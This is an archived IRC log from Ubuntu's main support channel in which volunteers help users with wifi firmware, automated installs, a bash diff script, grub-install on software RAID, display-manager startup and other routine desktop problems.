/srv/irclogs.ubuntu.com/2018/03/31/#ubuntu.txt

tomreynagio: installing to persistent storage will not only provide persistence, so you can keep configuration changes (such as workarounds to this issue) across reboots, it also provides notably better performance than the live install. plus you get a fully (security) patched system (the live install is only patched when it is released, not afterwards unless you install patches manually, but this wont work for kernel patches).00:06
tomreynagio: you see there are several good reasons to use a persistent installation, whereas i see very few to none for using the live install generally.00:07
agioIf I wanted to upgrade the the chipset firmware for my laptop's PCI connected wireless device - how would I do that ? I can't `aptitude install <chipset_firmware_package>' can I?00:07
tomreynreally the only reason i can think of is testing things, but you said you're using it for many days or a month now? i asked before why you do this, you did not answer, so i won't (directly) ask again.00:08
=== mkv is now known as m4v
agiotomreyn: ah yes, I remember you asking - you said maybe you could suggest a better way of achieving what I was trying to do rather than a live USB. sorry I didn't fully answer.00:10
tomreynagio: there is the linux-firmware package which provides firmware for many devices (i have not checked whether it provides firmware for yours, yet). it gets updates occasionally. if you want even newer firmware or firmware that is not available in this package, you'll need to manually find it somehow and place it somewhere in /lib/firmware00:10
tomreynagio: no problem. i assumed you had privacy related reasons not to discuss it.00:11
tomreynbut if that were the case i'd rather run TAILS or similar.00:12
=== compdoc_ is now known as compdoc
agiotomreyn: the basic reason I  am using the live USB is that I am just trying to test stuff. e.g. laptop  timeout settings e.g. how long it waits till it suspends. also getting versions of the software I want right before I actually commit to an install. because its harder to change then. e.g the lastest firefox doesn't support the plugins im used to  etc. The live USB lets me try stuff. revert to the older00:14
agioversion etc00:14
agiotomreyn: no, no privacy reasons. only reason I didn't answer your question earlier was I got a bit sidetracked trying to get my syslog off the broken computer and up to a pastebin!00:17
agiotomreyn: I see on the broken laptop there is a new version of the linux-firmware listed in its apt-cache - its on 1.157.11 and there is a 1.157.17 available? is  firmware typically the cause of network manager/wifi problems?00:23
tomreynagio: i see. well if you want a way to quickly reset things then you should use either snapshotting (a very handy feature LVM2 supports), a versioning system (such as git) or a rapid software deployment solution such as docker. wroking within a full VM with virtualbox and its snapshotting mechanism is also an option.00:24
tomreynthe latter is probably the most easy to grasp approach in case you're not into the others, yet.00:24
tomreynagio: "is  firmware typically the cause of network manager/wifi problems?" - > not neccessarily, but it can well be (i think it often is, but then there can also be bugs, regressions etc.).00:25
agiowhen you say "snapshotting" is that kind of like saving a "clone" of the hard disk - and then re-copying the clone/snapshot to "re-install" ?00:26
tomreynagio: it is my impression that the wireless chipset you have there was never really well supported. there are others which work better and provide more features and performance.00:27
agiobut im stuck with that wireless chipset right?00:27
agiounless I get another computer?00:27
tomreynunless oyu acquire a different one, i guess so.00:27
tomreynyou can always attach one via usb00:27
tomreynor if the casing allows for it, replace the wireless module00:28
agiohmmm. interesting..00:28
tomreynwhen i said "snapshotting" i was referring to 'freezing' a complete file systems' state, and keeping this state while continuing to work based on it and possible create further snapshots as you go.00:29
tomreynthis way you can create a timeline and always goback to a certain point where you created a snapshot.00:29
agiokind of like a git history?00:30
tomreynkind of, yes.00:30
tomreynsince you seem to have come across git, you could also use this to preserve states of configuration files. such as those of firefox.00:31
agiothe problem with that is when I change something - and I didn't know it at the time but it broke something else  - how do I get back to the good state ? I dont know which snapshot to use?00:31
=== mkv is now known as m4v
agioI mean the problem with snapshots/disk imaging/cloning/ or containers is they can capture the bad/misconfigured/hacked  stuff00:33
agioor versions of software that you can't uninstall or downgrade00:34
agioyes you could revert back to a snapshot of a month ago - but then you lose too much work/state etc00:34
tomreynagio: so take snapshots regularly (and delete outdated ones regularly).00:35
tomreynagio: and before you revert you can backup any data you still need. you can also store all your data in a different location that the configuration, in fact you should.00:35
agiomy current approach is I use ansible and shell scripts to install and configure new machines - and then manage things like say firefox configs etc mostly from within the ansible git repository00:35
Deetsternot the actual reason i'm here, but is there an easy way to figure out how a 2gbinstall managed take up a 32gb drive?00:36
tomreynagio: just for yourself? doh, you are the most structured person i know of, i guess.00:36
agiotomreyn: I re-use alot of the ansible/install scripts between my ubuntu laptop and ubuntu servers I manage - its a big advantage of ubuntu in my experience00:38
tomreynagio: i guess ansible is great when it comes to deploying systems for the first time, but it's not as great when you want to apply specific configurations (or configuration changes) to an existing system. i prefer puppet for this.00:38
tomreynothers would say salt stack, chef etc.00:39
agioso you mean like it you wanted to apply a variation to a system config? Im pretty new to ansible - mostly used shell scripts in the past - but at least compared to shell scripts ansible works for me for re-applying configs to an existing machine00:41
tomreynDeetster: depends a bit on how you partitioned and which file systems you created there and where you mount them to. lsblk and "df -h" should hint on this. and then there is "du -schx /*" and "du -schx /var/*" etc to get a better idea of where the data is in use.00:41
tomreynDeetster: or install baobab for a graphical / GUI take on this00:42
tomreynagio: re-applying the same configuration generally, yes. but for making fine-grained changes / merging etc. i think puppet is better.00:43
tomreynagio: you must have a software developer background or similar, since you ar einto git and a little into ansible and deployment in general, but  have not considered to replace your wireless module (something a system administrator or hardware person would probably have considered).00:45
agiotomreyn: cool. I should take a look at puppet. yeah, Im a web develper mostly - not systems /hardware. when I gave you the [nnnn:nnnn] number output from the `lspci -nn' command earlier did you do a lookup to find out about the chipset and history of bugs etc. I would be interested to know which service/site you used?00:46
tomreynagio: it is called "web search". many people would say "google", ;-)00:49
tomreynyou just put these ids in quotation marks, add "linux" and there you go00:50
tomreynsome long term system administration background or a certain understanding of how the kernel, kernel modules and the common user space software play together helps a lot, though.00:51
tomreyn(in dissecting the information)00:51
agiotomreyn: lol, fair enough. I thought there may have been some feature on launchpad bug tracker or ubuntu web search or something00:52
Deetstertomreyn: i'll try that00:53
tomreynagio: i'm not aware of any such features (but it doesn't rule it out). there are databases which resolve these IDs to names. your computer has a copy of those which can be updated using the update-pciids and update-usbids commands. but this doesn't improve the driver support, just the presentation / naming of things in the output produced by utilities such as lspci and lsusb00:58
agiotomreyn: in terms of generally stability for the testing of system setups etc - where say you need the system to remain up for say about a week - would you recommend the live USB? I'm finding the live USB is stable enough to last a few days typically - then I run into some issue like this wifi problem - or it doesn't resume from suspend etc. If  I make sure all packages are at latest (apt-get dist-upgrade)00:58
agioand use the latest installer (e.g. 16.04.5) is it reasonable to use the live USB for what Im doing? or were the live USB's only designed for a quick 45minute tour of the desktop to decide if you like it? and ubuntu dont really expect the live USB's to be any more stable than that?00:58
Deetsterwhat manner of nonsense is this. steam with a single game installed in 20gb?00:59
tomreynthe live usb's are really only designed for the quick tour, and to recover your broken persistent installtions.00:59
tomreynagio: ^ for repeatedly bootstrapping a system you'll use for days or weeks i would surely recommend setting up a fully automated deployment mechanism.01:01
agiolike?01:02
tomreynagio: the easy way to install ubuntu fully automated is called "preseeding" ("preseed") where you boot off the network and have the installer run automatically, setting up the system based on parameters you provided on a configuration file (stored on a different computer on your network). and then you could deply your configurations there using ansible.01:04
tomreyn*deplOy01:04
tomreyn...or using git.01:04
tomreyn!preseed01:06
tomreyn:-/ doesn't exist01:06
tomreynhttps://help.ubuntu.com/lts/installation-guide/amd64/apbs02.html01:07
agio"boot off the network" --> does that mean when I first boot - I enter BIOS custom boot menu and choose "boot from network" ? where does the MBR / partition table/ grubloader etc come from ? I wouldn't have wifi access ? would I need to have ethernet/wired connection to internet?01:07
tomreynhttps://help.ubuntu.com/lts/installation-guide/amd64/apb.html01:08
tomreynagio: right, you'd set your bios / uefi to "boot from network" and set up a "tftp" server (a very simple ftp-like server) on another computer in your LAN to host the installer kernel and the preseed configuration file, as well as a little dhcp server (which assigns ip addresses automatically etc.). those files from the tfpt server are then loaded by the newly booted 'test' system automatically.01:10
tomreynand then it runs the installer fully automated, which only takes a few minutes.01:11
tomreynpart of the installation is to write the MBR / install grub.01:11
agioah thats the point of the preseed file? is to provide all that info which normally a full system could get at - but because at this point the system hasn't fully bootstrapped it has to get info from a "special file in the preseed format?"01:11
Deetstertomreyn: that program was great. had no idea that i managed to download that much on steam workshop (mostly because i downloaded it all from a different computer)01:12
Deetsternow i'm going to reboot and see if my SD card reader comes back, since it worked before installing steam01:12
tomreynagio: exactly01:14
tomreynagio: here's an example preseed file someone posted here the other day: https://pastebin.com/raw/S2BBwKuH01:15
Deetsterwell that didn't work. its been too long since i was on ubuntu, i dont remember how to do anything xD01:17
DeetsterSD card reader worked the other day, stopped working for no apparent reason. card works in other computers01:17
zeus__hi01:27
zeus__im new to bash scripting01:27
zeus__can anyone guide me on using `diff -u` on two files, why i see some lines without `+` or `-` meaning they are present in both the files01:28
zeus__any help would be appreciated01:29
tomreynzeus__: yes, lines starting without + or - are just shown to provide context. they are the same in both files.01:31
zeus__is there a way i can remove them from the output01:32
tomreynzeus__: you could grep just the lines starting with + or -, or you could just use diff without -u01:33
zeus__oh yes, i didnt thought about grep. thanks alot01:34
tomreynto filter the output through grep, you would add something along the lines of:     | grep '^[-+]'01:35
tomreynagio: FWIW, i just looked at your kernel log (it's full of errors because of the nature of the live install, many files cannot be written to disk). It contains this line:  Loading firmware rtlwifi/rtl8192sefw.bin01:36
zeus__im doing it now01:37
tomreynagio: so that's the firmware your wireless adapter uses.01:37
tomreynthis is installed as part of the linux-firmware package01:38
zeus__can i paste a line of code here?01:39
tomreynzeus__: one line yes, many lines, no01:39
tomreyn!paste01:39
ubottuFor posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.01:39
zeus__Dif="$(diff -u "a" "b" | grep '^[-+])"01:40
zeus__unexpected EOF error01:40
zeus__how can i properly grep it and save it to this var01:41
tomreynagio: and here's a bug report which discusses the issue of connection drops for this chipset, and where a newer (?) firmware of unknown origin (?) is provided for it: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1454843/01:42
ubottuLaunchpad bug 1454843 in linux (Ubuntu) "10ec:b723 Realtek RTL8723BE wireless card drops connection" [Medium,Triaged]01:42
tomreynzeus__: Dif="$(diff -u "a" "b" | grep '^[-+]')"01:43
tomreynzeus__: just dont cut off the trailing single quote ;)01:43
zeus__oh im soo noob at this :)01:45
tomreynzeus__: assigning multi-line values to a variable does not always provide the inteded effects, however. you *may* need to dump it to a temporary file and read from it later.01:45
tomreynzeus__: everybody makes those mistakes which is why people who develop software usually use editors which provide syntax coloring, and why mature scripting and programming language provide better error output.01:46
zeus__thats the thing which i love about this community :)  Prob the best support01:48
agiothe lines starting with `+' , and `-' represent the differences not the context.01:49
tomreynfor bash, #bash is a lot better, plus they have a better quote db than ubottus.01:49
tomreynagio: correct.01:49
zeus__if [! -z  "$DIF" ]  Does this mean if the var Dif is empty01:52
=== handleV3 is now known as handlebar
=== brainwash_ is now known as brainwash
zeus__what im trying to do is to collect the diff in a variable, and if there is some changes, print the changes01:53
zeus__and overwrite the file with original text ( which was before it getting changed)01:54
agiotomreyn: nice find on the kernel log output and bug report - Im just reading it and testing on my laptop now. One thing I do like about all the hardware in this laptop with the wifi problem (lenovo edge) is that I don't need any packages out of restricted -the entire system seems comprised only from main and universe01:58
tomreynecho lines=$(echo $DIF | wc -l)", storing the number of lines returned. then [ $lines -gt 9 ] && echo "there is a difference:"; echo $dif01:58
tomreynzeus__: ^01:58
tomreynagio: right, except, of course, the binary firmware blobs are effectively unmaintained, since they are proprietary code which (more or less) nobody understands but the company developing the hardware.02:00
zeus__$lines -gt 9  what dies this command do ?02:03
tomreynzeus__: look into inotify / incron if you would like to have the kernel notify (and spawn) your scripts when files change02:03
=== gr33n7007h is now known as al2o3-cr
agiowhich firmware binaries? out of universe/main? - I thought to be in main/universe the code had to be open source + persmissive licences?02:03
tomreynzeus__: do you have man pages (package "man-db") installed ? if so, run "man test" to learn about -gt02:04
tomreynagio: those in the linux-firmware package.02:04
=== renatos is now known as infern0s
agiotomreyn: but `apt-cache policy linux-firmware' shows linux-firmware comes out of main - thats supported open source right?02:06
tomreynagio: i dont think the code in main/universe has to always be open source + permissive licences. other distributions handle it this way, ubuntu is maybe not as strict. i am not sure about the exact policies there.02:06
zeus__i didnt knew about it, theres alot of good info, thanks alot :002:07
agioI think thats what restricted is for - yes ubuntu will "comprimise" and enable installs of non-free software as part of the default OS config - but only hardware drivers and only if there is no other way a user could install ubuntu02:09
tomreynagio: see the files in /usr/share/doc/linux-firmware/ for details on licensing and copyrights.02:12
agioand restricted is supported (to the extent that ubuntu can support closed-source proprietary code )02:12
tomreynzeus__: there is also "man bash" if you have a couple hours ;)02:14
agiohuh, Im reading /usr/share/doc/linux-firmware/LICNECE.realtek firmware.txt - and it does seem it only allows redistributing binaries only? and no reverse engineering etc - thats totatlly not free - why isn't it in restricted or multiverse?02:17
=== Israphel is now known as Guest94452
tomreyni do not know the exact policies which apply to the sections (main, universe, multiverse). the only distinction i know is about security support. 'main' gets full security support by the ubuntu secrutiy team.02:19
=== Israphel_ is now known as Israphel
agioyeah, I think main does - for  sure - get security support - so does restricted (but  it must surely be limited) and so does canonical partners - but again that must surely be limited as "partners" is closed-source propritary code02:23
tomreyni would be interested in how other people would explain it. that it is in main strikes me as wrong, too, and that's why i brought it up initially. i do, however, acknowledge the (sad) reality that a lot of hardware devices require those blobs to work properly. including our cpus. and i do appreciate the fact that getting things to work is easy with ubuntu.02:31
zeus__[ $lines -gt 9 ] && echo "theres a dif"; this line the echo doesnt seem to work02:38
tomreynzeus__: i think i mean -gt 002:39
tomreynnot  -gt 902:39
zeus__ok02:42
tomreynzeus__: thinking again, it's possible that you may always have one line of output02:44
agioyeah, but isn't that what "restricted" is for? - its the  "component" of apt repository for those packages - which we have to just live with as closed - for example - this laptop which Im IRC'ing on - has the intel-microcode package - which I understand is akind of dynamically loaded firmware -"intel-microcode" is in restricted02:45
tomreyn...a minimum of02:45
zeus__it applies on one line of output02:46
tomreynagio: for me, the latest version of intel-microcode is in main, not restricted02:47
kostkon!info intel-microcode02:49
ubottuintel-microcode (source: intel-microcode): Processor microcode firmware for Intel CPUs. In component main, is extra. Version 3.20180312.0~ubuntu17.10.1 (artful), package size 1254 kB, installed size 1757 kB (Only available for i386; amd64; x32)02:49
cuddylierDoes anyone know what 'grub-install: error: disk `md0' not found' means?02:51
cuddylierI've setup raid 1.02:51
agiotomreyn: ah same here no that I look at it: the original package in the release "pocket" v 3.20151106.1  was in "restricted" but now  version 3.20180108.0 is in "main" weird...02:51
tomreyncuddylier: it means that there is no dask called md0. which is probabyl correct.02:53
tomreyn*disk02:53
tomreyncuddylier: what were you running?02:53
tomreynor rather: which command produced this output?02:54
cuddyliertomreyn: I ran 'grub-install /dev/sda'02:54
cuddylierAnd grub-install /dev/sdc produces the same output (the two drives in the raid 1 array)02:54
tomreyncuddylier: hmm, that's interesting, i'm not sure what's happening there. can you shouw "lsblk" output?02:57
tomreyncuddylier: also, which ubuntu release is this?03:02
cuddylierJust getting the output of that command atm and Ubuntu 16.0403:02
tomreyn16.04 .0, .1, .2, .3, .4 or .5?03:04
tomreynlsb_release -ds03:04
cuddylier16.04.303:04
tomreynthen patch the system and try again03:05
cuddylierRight now I've just got it in a rescue mode as I couldn't boot it fully due to lack of grub.03:05
cuddyliertomreyn: lsblk output: https://pastebin.com/raw/yhbQKfkr03:06
=== apsknight1 is now known as apsknight
tomreyncuddylier: can you also show:  grub-install -v /dev/sda03:07
cuddyliertomreyn: https://pastebin.com/raw/hSftd2xS03:08
tomreyncuddylier: and see man grub for possible workarounds such as -s, --skip-fs-probe or even --force (but i would not do this, yet, not sure what it will do to your md0)03:08
=== marve is now known as Guest32908
tomreyncuddylier: do you have /boot/grub/device.map ? if so, can i see it?03:12
cuddylierNope, that isn't there.03:13
TJ-cuddylier: because of the way you've laid out the system you need to create a /boot/grub/device.map to help grub-install know where things are03:13
cuddylierIs the way I've laid it out special?03:14
cuddylierOr what part confuses it?03:14
TJ-cuddylier: run this then try grub-install again: "  echo "($(sudo grub-probe -t bios_hints -d /dev/md0)) /dev/md0" | sudo tee -a /boot/grub/device.map  "03:14
cuddylierTJ-: grub-probe: error: disk `md0' not found.03:15
cuddylier() /dev/md003:15
TJ-cuddylier: it's currently mounted isn't it?03:16
cuddylierYes03:16
cuddylier /dev/md0        472M   53M  395M  12% /boot03:16
TJ-cuddylier: does "cat /proc/mdstat" confirm that?03:16
cuddylierTJ-: echo "($(sudo grub-probe -t bios_hints -d /dev/md0)) /dev/md0" | sudo tee -a /boot/grub/device.map03:16
cuddylieroops03:16
cuddylierTJ-: https://pastebin.com/raw/z8GRete303:16
TJ-are you running grub-install from within a chroot on /dev/md1 ?03:17
cuddylieryeah03:17
TJ-cuddylier: did you (bind) mount devfs into the chroot ?03:17
cuddylierTJ-: I did: mount -o bind /dev /mnt/linux/dev03:18
cuddylierhttps://pastebin.com/raw/bGyW0PDd03:18
TJ-cuddylier: OK, so from inside the chroot there should be block nodes /dev/md0 and /dev/md103:18
cuddylierHow do I check that?03:19
TJ-cuddylier: this isn't correct: "mount /dev/sda2 /mnt/linux"03:19
tomreynls -l # :)03:19
TJ-cuddylier: your lsblk shows " └─md1   9:1    0 476.3G  0 raid1 /"03:19
cuddylieroops, I forgot to say I replaced with: mount /dev/md1 /mnt/linux03:19
TJ-so it should have been "mount /dev/md1 /mnt/linux"03:20
TJ-cuddylier: trying to catch us out huh? :D03:20
cuddylieryeah, I did that, sorry for the confusion :P03:20
TJ-hehehe03:20
tomreynin case you won't find a solution this ooold bug report suggests that mdadm is not installed: https://bugs.launchpad.net/ubuntu/+source/grub-installer/+bug/131534403:20
ubottuLaunchpad bug 1315344 in grub-installer (Ubuntu) "Grub install failed on disks with software RAID" [Undecided,Confirmed]03:20
TJ-Yes, and my recent one where I've got the device.map workaround and am working on a permanent GRUB source fix: bug #175651703:22
ubottubug 1756517 in grub2 (Ubuntu) "grub-install: error: diskfilter writes are not supported" [Low,Triaged] https://launchpad.net/bugs/175651703:22
TJ-cuddylier: the fact grub-probe is failing is key to this, and it not finding the dev node is very wrong03:23
cuddylierhmm :(03:23
TJ-cuddylier: which meta-data version is md0 using?03:25
cuddylierTJ-: How do I check?03:25
TJ-cuddylier: "mdadm --examine /dev/sda2"03:25
TJ-cuddylier: 2nd line should show "Version: ...."03:26
tomreynnow that you ran "mdadm --examnine", grub-install /dev/sda should work03:27
cuddylierSeems like the mdadm package is in deed not installed03:27
tomreyn:)03:27
cuddylierAnd I can't actually get apt-get to work on this chroot03:27
tomreynhow so?03:28
cuddyliersources.list is messed up with what my PXE boot put it in it03:28
TJ-cuddylier: exit the chroot then do "mount --bind /etc/resolv.conf /mnt/linux/etc/resolv.conf" then "chroot /mnt/linux" and try apt again03:28
cuddylierresolv.conf was an issue but I fixed that03:29
TJ-mdadm must be available somewhere it was used to assemble the 2 arrays03:29
cuddylierThe vim installed on Ubuntu 16.04 is very confusing to use :(03:29
tomreynwhy would your pxe boot mess with what's in /mnt/linux ?03:29
cuddyliercat /proc/mdstat works fine yeah03:29
TJ-is that done from outside the chroot?03:29
cuddylierI did cat /proc/mdstat inside03:30
TJ-cuddylier: right, but the tool that assembles arrays, called by udev, is mdadm03:30
TJ-it's a bit of a weird arrangement. I'd have made /dev/sda + /dev/sdc = /dev/md0, then partitioned it and but the root-fs and /boot/ in 2 partitions that way03:32
tomreyni would still expect /mnt/linux/etc/apt/sources.list to be unmodified by the PXE boot03:32
TJ-tomreyn: agreed, and if the root-fs which requires md has no mdadm then something is broken03:32
tomreynmaybe the initrd was not generated there but copied, and mdadm was never installed there.03:33
TJ-possibly03:34
TJ-thing is though /boot/ is not required to mount the root-fs so the initrd mdadm /conf/mdadm.conf wouldn't usually have an entry for /dev/md0 - that would be left for the real init system to do03:35
tomreynhmmm. well i'm sure cuddylier will let us know once he finds out.03:36
cuddylierYeah, I'm going to try installing with /dev/sda and /dev/sdb to see if that makes a difference.03:37
TJ-sdb is the USB isn't it?03:37
TJ-oh, no, I misread03:37
TJ-yes, sda + sdb looks more sensible since they're the same size03:38
TJ-and I'd suggest build the array directly from sda + sdb, then partition the resulting md0 and adding your file-systems there03:39
cuddylierAs in just have a single raid array?03:39
cuddylierAnd not a separate /boot one?03:39
TJ-That way the grub-probe workaround I gave will work (from Bug #1756517)03:40
ubottubug 1756517 in grub2 (Ubuntu) "grub-install: error: diskfilter writes are not supported" [Low,Triaged] https://launchpad.net/bugs/175651703:40
TJ-cuddylier: yes, you only need to RAID the physical disks03:40
tomayhello03:40
tomayand bye03:40
tomayjust testing03:41
TJ-cuddylier: makes it much easier to deal with since you've already shown you want booth root-fs and /boot/ protected anyhow03:41
tomreynI'm going to try sleeping (without /dev/sda and /dev/sdb) to see if that makes a difference.03:42
zeus__even when theres no difference why it finds empty white space, and says theres a difference and thats an empty line03:42
tomreynsorry zeus__, it's too late here, maybe ask in #bash, goo dluck03:43
zeus__ok good night03:44
TJ-zeus__: you say you're trying to revert changes to file A based on an original file B ?03:47
cfoch__Hello04:06
cfoch__does somebody use Cheese here?04:06
amazingqkhi04:18
cfoch__hi04:28
Javabean!hello04:28
OfCourseMyHorsehello04:28
WHOAMIwhat issue?04:29
WHOAMIexit04:29
WHOAMIman04:29
zczbdHello. I have Kubuntu 17.10 installed on my Dell 7559 with dual graphics. If secure boot is DISABLED, the laptop refuses to boot. I'm using Intel graphics with proprietary nvidia drivers04:31
jpastorehi I'm setting up a new server with 16.04 LTS. This is a fresh install, was looking for some recommendations on how to configure the drive layout. I have a 256gb ssd to boot (did 8gb swap and rest for /) and I 5x3.7tb sshd and 4x1tb ssd.04:35
Javabean!patience04:36
ubottuDon't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or https://ubuntuforums.org or https://askubuntu.com/04:36
jpastorewanted to make the SSDs a single drive for a database. and use the sshd's for storage as a single drive. on board controller no hardware raid.04:36
jpastoredoes anyone have an opinion on best practices/file system of choice?04:37
=== deathonater is now known as Smeef
shuforovHi, how going beta of ubuntu?04:54
energizershuforov: 18.04?04:54
shuforovyes04:54
energizerhttp://cdimage.ubuntu.com/daily-live/current/HEADER.html04:55
shuforovoh no, beaver beta04:55
energizer?04:55
shuforovdamm sory04:55
shuforovmy mistake04:55
shuforovstill sleeping just wake up.04:56
shuforovthenx for link energizer04:56
energizershuforov: https://wiki.ubuntu.com/BionicBeaver/ReleaseSchedule04:56
shuforovenergizer, yes i monitoring this link :) cant wait to update to it from 16 lts04:57
=== BartolomeBellid is now known as BartolomeBellid1
=== BartolomeBellid1 is now known as BartolomeBellid0
u0_a114hi05:02
=== marve is now known as Guest21656
solarradiationIf I install ubuntu onto a USB drive, can I boot from it on any machine?05:19
Kumoolno05:22
BartolomeBellid0Hi, does anyone know how long it takes a ghost nick to be free?05:22
Kumoolsolarradiation, if the machine is a different arquitecture it wont work05:22
AntiSlayermy ubuntu system keeps freezing05:22
Kumoolsolarradiation, theres also the drivers, which matter.05:23
Kumooltty wise, its possible, but with Xorg, its a bit harder05:24
KumoolBartolomeBellid0, ask in #freenode05:24
KumoolAntiSlayer, try cleaning the RAM, if that's not it check the disk drive05:25
AntiSlayerhow05:25
AntiSlayeris there a program to clean ram05:25
KumoolAntiSlayer, if the disk drive is not wrong, try upgrading to latest stable05:25
KumoolAntiSlayer, ... no05:25
BartolomeBellid0Kumool, thanks, i try this :)05:25
KumoolAntiSlayer, RAM is a physical device in the computer itself, if it gets dusty inside, you're gonna have hiccups and freezes05:26
AntiSlayerhow to upgrade to latest stable05:26
AntiSlayeroh okay05:26
KumoolAntiSlayer, what computer do you have?05:26
AntiSlayerubuntu 16.04 and it is an hp 15 f272wm05:26
Kumoolit could also freeze if the cpu gets hot05:27
AntiSlayerhow do i upgrade to the latest stable thingy05:28
Kumoolmm05:28
Kumoolit seems brand new so i doubt its anything physical05:28
Kumoolhave you noted when it freezes05:29
Kumoola pattern05:29
=== BartolomeBellid0 is now known as BartolomeBellid1
AntiSlayeryeah i was doing a bunch of stuff and then it froze while i was working on the computer then i had to cold boot it05:29
Kumoolmmm05:30
Kumoolwas it hot?05:30
AntiSlayerno05:30
AntiSlayeri feel no heat from it05:30
Kumooldid you install ubuntu?05:31
AntiSlayeryes05:31
AntiSlayerubuntu 16.04 lts05:31
AntiSlayerdesktop05:32
Kumoolyou're better off looking for a guide online on upgrading to 17.10 (this was the first hit https://askubuntu.com/questions/909323/ubuntu-gnome-17-04-ubuntu-17-10-upgrade)05:34
Kumoolcheck the answers section05:34
AntiSlayerkk thank you for your time05:34
Kumoolsorry, couldnt be of more help :S05:35
Kumooli'd suggest you install a hardware sensor05:35
AntiSlayerits alright have a wonderful day and happy easter05:35
AntiSlayerokay05:35
Kumooloh, you too05:35
Kumooloh, i'm also getting freezes too antisl... oh, gone :(05:38
ShriHarihello05:38
Kumoolhello ShriHari05:40
=== BartolomeBellid1 is now known as BartolomeBellid
=== BartolomeBellid is now known as Tuxer
=== Tuxer is now known as BartolomeBellid
k12I disabled my display manager using systemctl and now whenever I reboot, I don't get a graphical display unless I start it manually. When I run "sudo systemctl enable gdm3", I get an error saying that it failed, citing that the unit files have no installation config. What is the proper way to enable a display manager in Ubuntu? It's obviously not the same way it is with most distros I've tried.06:17
k12Which is the systemd method.06:17
k12Would be great if someone could help, because I'm not reinstalling Ubuntu, and I don't want to manually start my display manager every time I boot. thx06:18
tripelbwhat is a UI freeze?06:30
AscavasaionUI = User Interface I am guessing.06:30
tripelbyes..and?06:30
AscavasaionFreeze = stops reacting.06:31
tripelb | All hail our UI freeze on MARCH TWENTY-TWOTH06:31
tripelbso that was a finalization?06:31
tripelbWhen can I get 18.04 stable?06:31
tripelbthat's what I came here to ask06:32
tripelbfunny nick IGot2P06:32
tripelbam reading https://itsfoss.com/ubuntu-18-04-release-features/06:35
tripelb26th April: Stable Ubuntu 18.04 LTS release -- Let me look. Maybe that is in the topic already.06:37
tripelbMODS PUT The date in the Topic, That is my suggestion. That is all.06:38
k12!pastebin06:46
ubottuFor posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.06:46
k12For anybody who needs to see what it reads exactly, here's what I get: https://paste.ubuntu.com/p/N5kn6N7Rsd/06:51
k12I tried googling my problem, and the only solution I find to enabling a display manager is here: https://askubuntu.com/questions/19320/how-to-enable-or-disable-services#1932406:53
lotuspsychjek12: i just joined, do you want to install a desktop envorinment?06:55
k12lotuspsychje: no, trying to re enable my display manager.06:55
AscavasaionInstalled Ubuntu 16.04.4 and installation took forever... eventually go to the point where I say yes to reboot into OS and I get this message, "MODSIGN: Couldn't get UEFI db list " and the computer had frozen and refuses to restart.  Any ideas so as not to corrupt installation please?06:55
k12But I see something for permanently reenabling it, and odly enough I didn't see it there, because I'm dumb. Going to give it a shot.06:56
lotuspsychjek12: display manager comes with the DE?06:56
k12brb06:57
lotuspsychjeAscavasaion: are you singlebooting ubuntu?06:57
Ascavasaionsinglebooting? As in Ubuntu is the only OS to boot?  then yes.,06:58
lotuspsychjeAscavasaion: ok, have you disabled secureboot & fastboot?06:59
Ascavasaionlotuspsychje: secureboot I do not know.  I have disabled fastboot though.06:59
WillzorHi there im having a lot of issues with My Nvidia drivers can anyone help?06:59
WillzorIm on a laptop if that helps at all.07:00
lotuspsychje!details | Willzor07:00
ubottuWillzor: Please elaborate; your question or issue may not seem clear or detailed enough for people to help you. Please give more detailed information; for example, we might need errors, steps, relevant configuration files, Ubuntu version, and hardware information. Use a !pastebin to avoid flooding the channel.07:00
lotuspsychjeAscavasaion: try legacy in your uefi settings07:01
WillzorI have all the drivers installed for prime but when i load the server up i dont get anything07:01
lotuspsychjeWillzor: are you on untu server?07:01
Ascavasaionlotuspsychje: but I am in the installation and it is trying to reboot for the first time and froze.07:01
WillzorIm not on the server no07:02
lotuspsychjeWillzor: wich nvidia driver are you using?07:02
WillzorThe Nvidia X server Settings07:02
WillzorAnd 39007:02
lotuspsychjeWillzor: and on wich ubuntu version?07:02
WillzorYou mean the Kernal?07:03
lotuspsychjemorning EriC^^07:03
EriC^^morning lotuspsychje07:03
lotuspsychjeWillzor: no i mean ubuntu version07:03
WillzorHmm how would i find that?07:04
lotuspsychjelsb_release -a Willzor07:04
WillzorNo LSB modules are available. Distributor ID:MakuluLinux Description:MakuluLinux 14 LinDoz Release:14 Codename:LinDoz07:04
lotuspsychjeWillzor: we only support ubuntu here mate07:05
WillzorIt is07:05
WillzorIts Ubuntu07:05
lotuspsychjeWillzor: we only support vanilla ubuntu & their flavors here07:06
WillzorIts all of the Ubuntu things just with a few added icons and what not07:06
lotuspsychjeWillzor: we only support official ubuntu & its flavors here07:07
k12lotuspsychje: it's GDM3 which comes with the gnome desktop environment.07:07
WillzorSo your not willing to help me out even tho im saying its the same thing?07:07
WillzorLike really the same thing just a few added icons and you want to say screw you/07:07
lotuspsychjeWillzor: its not that i dont want, we cant help unofficial ubuntu distro's here07:07
WillzorRight and saying you dont want to help and saying what you said isnt the same thing?07:08
lotuspsychjeWillzor: for your distro, seek help on their official web/irc07:08
ducasse!based on ubuntu | Willzor07:08
=== fatty is now known as stibium
ubottuWillzor: The Ubuntu channels can only provide support for Ubuntu and its official flavors, since other distributions and derivatives have repository and software changes. So please use their dedicated support venues, for example: Linux Mint (#linuxmint-help on irc.spotchat.org), Kali Linux (#kali-linux), and LXLE (#lxle)07:08
WillzorLetting someone hand like that isnt cool07:08
WillzorThey dont have an irc that i can see07:09
lotuspsychjeWillzor: if you like ubuntu support, choose an official ubuntu flavor and youl get help here07:09
ducasseWillzor: lotus is right, it's not supported here. you need to use their support forums.07:09
WillzorOk and they dont have one that i can find?07:09
WillzorEven tho everything on this OS is Ubuntu but you cant help?07:09
WillzorWhat sense does that make?07:09
lotuspsychjeWillzor: understand your distro is NOT ubuntu07:10
ducassei'm sure there is something listed on their website.07:10
WillzorIm sure there isnt07:10
WillzorIve looked07:11
lotuspsychjeWillzor: you agree, you are the one that choose your Os?07:11
